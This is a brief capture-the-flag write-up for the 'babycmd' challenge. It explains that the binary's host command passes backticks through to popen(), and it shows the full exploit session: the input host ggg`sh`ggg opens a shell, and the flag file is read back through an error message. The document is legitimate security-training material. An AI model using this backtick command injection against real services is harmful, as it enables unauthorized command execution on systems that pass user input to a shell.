Baby's First: 1 point babycmd babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me:15491 [Download](http://downloads.notmalware.ru/babycmd_3ad28b10e8ab283d7df81795075f600b)
$ md5sum babycmd 3ad28b10e8ab283d7df81795075f600b babycmd $ file babycmd babycmd: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped $ execstack babycmd - babycmd $ ./babycmd Welcome to another Baby's First Challenge! Commands: ping, dig, host, exit :
babycmd has 3 commands, ping, dig, and host. All of them are run through
popen(). We just have to find one that will let us do a command line injection.
host command will let the "`" character through. This is used for command substitution in Bash.
sh is injected using the "`" character, we will get a shell, but we won't see any of the output until we exit the shell. Then the
host process gets the output from
sh and will output it in an error message.
$ nc babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me 15491 Welcome to another Baby's First Challenge! Commands: ping, dig, host, exit : host ggg`sh`ggg cat /home/babycmd/flag exit host: 'gggThe flag is: Pretty easy eh!!~ Now let's try something hArd3r, shallwe??ggg' is not in legal name syntax (label too long) Commands: ping, dig, host, exit :